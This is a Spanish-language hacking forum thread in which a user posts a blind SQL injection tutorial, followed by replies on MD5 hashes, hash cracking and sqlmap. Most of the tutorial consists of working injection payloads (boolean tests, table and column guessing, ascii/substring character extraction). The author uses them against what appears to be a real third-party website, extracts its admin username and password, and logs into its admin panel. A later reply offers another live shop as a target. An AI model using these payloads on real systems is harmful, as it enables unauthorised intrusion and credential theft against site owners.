Blind SQLi desde cero [SQLi a ciegas] by ANTRAX

Iniciado por ANTRAX, Junio 30, 2012, 08:04:55 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1 2
Acciones del Usuario
Junio 30, 2012, 08:04:55 PM
Introducción:
Hola a todos los lectores, en este Nuevo paper vamos a ver la Blind SQLi, como es, para que sirve y como emplearla. Intentare explicarlo lo mejor posible y con un ejemplo para que puedan guiarse mejor. Aclaro que este tutorial está hecho con fines educativos y no destructivos. No me hago responsable del mal uso que puedan darle.

¿Qué es Blind SQLi?
Blind SQLi o Ataque a ciegas por SQLi es otro método o alternativa a la tradicional SQLi, es utilizada cuando la web no tira ningún tipo de error ya que los webmasters han quitado la o desactivado el SHOW_WARNINGS y SHOW_ERRORS que son los encargados de imprimir errores en pantalla cada vez que se hace una petición errónea a la base de datos pero si podemos comprobar datos por medio de verdaderos o falsos y a lo largo de este paper veremos a que se refiere con esos verdaderos y falsos. El nombre Blind SQLi o SQLi a ciegas hace referencia a que los nombres de las tablas y demás datos que saquemos, lo haremos adivinándolo ya que no mostrara ningún error en pantalla.
Para este paper usaremos la siguiente url como ejemplo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Como se puede ver, es de alguien que diseña websites, vamos a ver que tal es el servicio que ofrece...
Para saber si es o no vulnerable, debemos buscar algún sitio en donde haga peticiones a la bd para poder inyectar. Yo probare usando esto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Para probar si la web es vulnerable o no, vamos a aplicar intentar ver si nos arroja esos verdaderos o falsos de los que hablamos anteriormente.
Lo que debemos hacer es añadirle a la url esto:

AND 1=1    >> Verdadero
AND 1=0    >> Falso

O sea que si tenemos la url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Para el caso verdadero seria: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta AND 1=1
Para el caso falso seria: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta AND 1=0
Veamos como afecta esto en la visualización de la página...
Verdadero:


Falso:


Como se puede ver, el caso falso no carga nada...
Existen variables al AND como lo es el having

Verdadero >> Having 1=1
Falso >> Having 1=0

Entre otros... Pero nosotros usaremos el AND para no complicarnos tanto...
Ahora vamos a buscar el nombre de alguna tabla de la cual podamos obtener datos que a nosotros nos interese. En este caso, yo quiero encontrar alguna tabla de usuarios o administradores para poderme loguear.
Comencemos...
A nuestra url le vamos a añadir:

AND (SELECT(COUNT(*)) FROM usuarios);

Debería quedar así:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta AND (SELECT(COUNT(*)) FROM usuarios);

El COUNT sirve para realizar un contador con el número de filas que tenga una tabla.
Con esto haremos la consulta para saber si la tabla usuarios existe o no


Falso... Debemos seguir probando, hasta que algún nombre que coloquemos de verdadero.
Después de probar varias veces, logre dar con el nombre de la tabla que tiene información valiosa. El nombre de esta tabla es admin y como se ve en la imagen, me volvió a mostrar el contenido, esto quiere decir que es Verdadero.


Ahora veremos cuantos registros tiene esta tabla. O sea cuantos usuarios admines tiene esta página. Para ello, modificaremos un poco lo que colocamos anteriormente por esto:

AND (SELECT(COUNT(*)) FROM admin) > 7
Esto quiere decir que hay más de 7 admines

AND (SELECT(COUNT(*)) FROM admin) < 7
Menos de 7 admines

AND (SELECT(COUNT(*)) FROM admin) = 7
Hay 7 admines

En mi caso me dio Verdadero el Segundo caso... Hay menos de 7 admines.


Sigo probando bajando la cantidad, hasta que finalmente puedo adivinar cuantos registros hay.
En este caso solo hay 1 solo admin. Si coloco:

AND (SELECT(COUNT(*)) FROM admin) = 1
Me dará Verdadero

Lo que sigue ahora, es buscar los nombres de las columnas para ello inyectaremos lo siguiente:

AND (SELECT(COUNT(name)) FROM usuarios)

En donde "name" será el nombre de la columna que intento adivinar


Falso...
Después de probar varias veces, llegue a que el nombre de una de las columnas se llama "user"


Ahora deberíamos seguir probando, hasta dar con el nombre de la columna de la tabla que contiene las contraseñas, ids, entre otras que pueden ser de valor para nosotros... Después de probar con varios nombres como password, passwords, clave, etc... llegue al punto en que me dio verdadero al colocar "pass" y también al colocar "cod"

AND (SELECT(COUNT(pass)) FROM admin)
AND (SELECT(COUNT(cod)) FROM admin)

Hasta ahora ya tenemos el nombre de la tabla del admin, y el de la columna de id o código, usuario y contraseña.
Ahora veremos como saber que longitud tiene el usuario y la contraseña, esto lo hacemos para saber cuantos caracteres tiene el user y la pass.
Como sabemos que hay 1 solo admin, podemos probar poniendo esto:

AND (SELECT length(user) FROM admin where cod=1) < 7

Explico la línea, Length sirve para saber la cantidad de caracteres que tiene, en este caso la columna user. En donde el cod sea 1. Traducido de forma más fácil, lo que hace esta línea es ver si el usuario tiene menos de 7 caracteres. Y en este caso me da falso...


Probare cambiando el signo de lado

AND (SELECT length(user) FROM admin where cod=1) > 7

Para saber si la contraseña tiene más de 7 caracteres, y nuevamente me da falso... esto quiere decir solo una cosa... que la contraseña tiene 7 caracteres. Asique probare poniendo:

AND (SELECT length(user) FROM admin where cod=1) = 7

Y como se puede ver... VERDADERO!!


Con esto ya sabemos que el usuario tiene 7 caracteres. Ahora restaría ver cuantos caracteres tiene la contraseña... La inyección es la misma que la que usamos, solo que modificamos user por pass
En mi caso, me dio verdadero que esta inyección:

AND (SELECT length(pass) FROM admin where cod=1) = 7
Tanto el user como la pass tienen 7 caracteres.

Una vez obtenido todos estos datos, podemos pasar a adivinar los datos que contiene cada uno.
Para ello se utiliza la siguiente inyección.

AND ascii(substring((SELECT user FROM admin where cod=1),1,1))=97

Ahora explico la linea, lo que hace esta inyección es verificar si la primer letra del usuario empieza con "a". ¿En dónde me fijo esto? En la siguiente tabla:


Ahí vemos que el 97 corresponde a la letra a.
Seguimos probando, hasta que nos dé Verdadero.
Después de probar un rato, llegue a que comienza con "G"

AND ascii(substring((SELECT user FROM admin where cod=1),1,1))=71


Para pasar al segundo carácter del usuario, debemos cambiar el ,1,1 por ,2,1 Esto sería como decir, el segundo carácter del primer registro. En mi caso me dio verdadero al probar con la letra "r"

AND ascii(substring((SELECT user FROM admin where cod=1),2,1))=114

Una vez que hayamos adivinado todos los caracteres que posee el usuario, hacemos lo mismo pero con la contraseña modificando el "user" por "pass" por ejemplo:

AND ascii(substring((SELECT pass FROM admin where cod=1),1,1))=103

Debemos ir probando carácter por carácter, hasta volver a obtener todos, Recuerden ir cambiando el ,1,1 por la posición que desean comprobar.
Una vez que finalicen, tendrán el usuario y la contraseña. En mi caso:

User: Gregory
Pass: geg*12a

Ahora si buscamos el panel de admin y probamos los datos:


Y... Estamos adentrooo!!


Bueno, esto fue todo por ahora, espero que hayan podido entender cada uno de los pasos y que les haya resultado útil para aprender la inyección a ciegas.

Junio 30, 2012, 08:11:38 PM #1
Está excelente Antrax muy bien explicado... deberíamos recalcar que los passwords muchas veces están en MD5.


Saludos,
Dedalo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Junio 30, 2012, 08:15:04 PM #2
Claro, gracias por la aclaracion, pero seguramente se daran cuenta de ello cuando miren el tamaño de la password. Cuando coloquen algo como:

AND (SELECT length(pass) FROM admin where cod=1) = 32

y les de verdadero, es por que es un hash en MD5, ya que este posee 32 digitos

Junio 30, 2012, 08:15:58 PM #3
es lo primero que normalmente yo hago para saber si está encriptada.


Saludos,
Dedalo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Junio 30, 2012, 09:18:09 PM #4
Muy bueno el tutorial.

Les va a servir a mas de uno

Saludos
Junio 30, 2012, 10:33:25 PM #5
Tengo una pequeña pregunta, en caso de que el pass este en md5, me imagino que ahi se acabo todo, porque no creo que nos de por probar los 32 caracteres del password
o me equivoco??




"Mess with the best, die like the rest"
Junio 30, 2012, 10:37:04 PM #6
En realidad de eso se trata... deberias probar los 32 digitos, y una vez que tengas la cadena, desencriptarla...

Junio 30, 2012, 10:49:50 PM #7
Quizá sea muy básica mi pregunta pero como podríamos desencriptar un hash de MD5? Existe alguna herramienta que nos ayude a este proceso? Muchas gracias por la ayuda, y por cierto EXCELENTE TUTO
Junio 30, 2012, 10:51:19 PM #8
Claro, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta pasate por ese post

Junio 30, 2012, 11:13:12 PM #9
Excelente muchas gracias !!! Una pregunta mas Saben cuales son los hashes mas utilizados y sus caracteristicas para identificarlos?
Junio 30, 2012, 11:14:51 PM #10
Underc0de posee una tool online desarrollada por Yoya

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Es un identificador de hash, solo colocas el hash ahi, y te dice que encriptacion tiene.

Saludos!

Julio 01, 2012, 12:22:12 AM #11
Nuevamente excelente!!! Gracias por tu ayuda
Julio 01, 2012, 01:15:45 PM #12
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tengo una pequeña pregunta, en caso de que el pass este en md5, me imagino que ahi se acabo todo, porque no creo que nos de por probar los 32 caracteres del password
o me equivoco??


igual y la blindsqli que ha hecho antrax aquí es muy básica en true y false... hay otras que son Time Based... que tienes que usar Sleep() para ver si son reales o no y pues muchas veces son en sha-1 así que yo te recomendaría que para blind sqli uses SQLMAP inclusive si fuesen encriptadas como en wordpress o joomla con algún salt te demorarías un monton...



Saludos,
Dedalo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Julio 01, 2012, 03:06:12 PM #13
ok, gracias por las respuestas aunque la verdad me parece moroso jeje estar haciendo eso manualmente sin embargo es bastante interesante y se aprende mucho, voy a utilizar la herramienta que me dijiste Dedalo
salu2




"Mess with the best, die like the rest"
Julio 01, 2012, 04:42:02 PM #14
Impresionante tuto ANTRAX, me ha encanto, muy didactico  ;D

-Saludos-
Julio 02, 2012, 12:34:29 AM #15
Muy buen Aporte, exelente! muy bien explicado!

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".
Diciembre 10, 2013, 05:53:09 PM #16 Ultima modificación: Diciembre 11, 2013, 06:43:17 AM por Kolibri26
Tutorial muy interesante y recomendado Antrax. Excelente!

Una pregunta, por lo que veo esta página web está protegido contra el SQLi verdad? Al ponerle el AND 1=1 parece que da un falso.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Diciembre 10, 2013, 07:00:01 PM #17
Pero eso es HTML, el SQLi se usa en php y asp
Saludos!
ANTRAX

Diciembre 11, 2013, 06:45:43 AM #18
Disculpa Antrax por el error, lo URL que quería poner era la de su tienda online:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos y gracias de nuevo.
Julio 16, 2014, 03:10:44 PM #19
Muy buen post.. pero se tiene que contar con tiempo me gusto bastante..
Imprimir
Ir Arriba Páginas1 2
Acciones del Usuario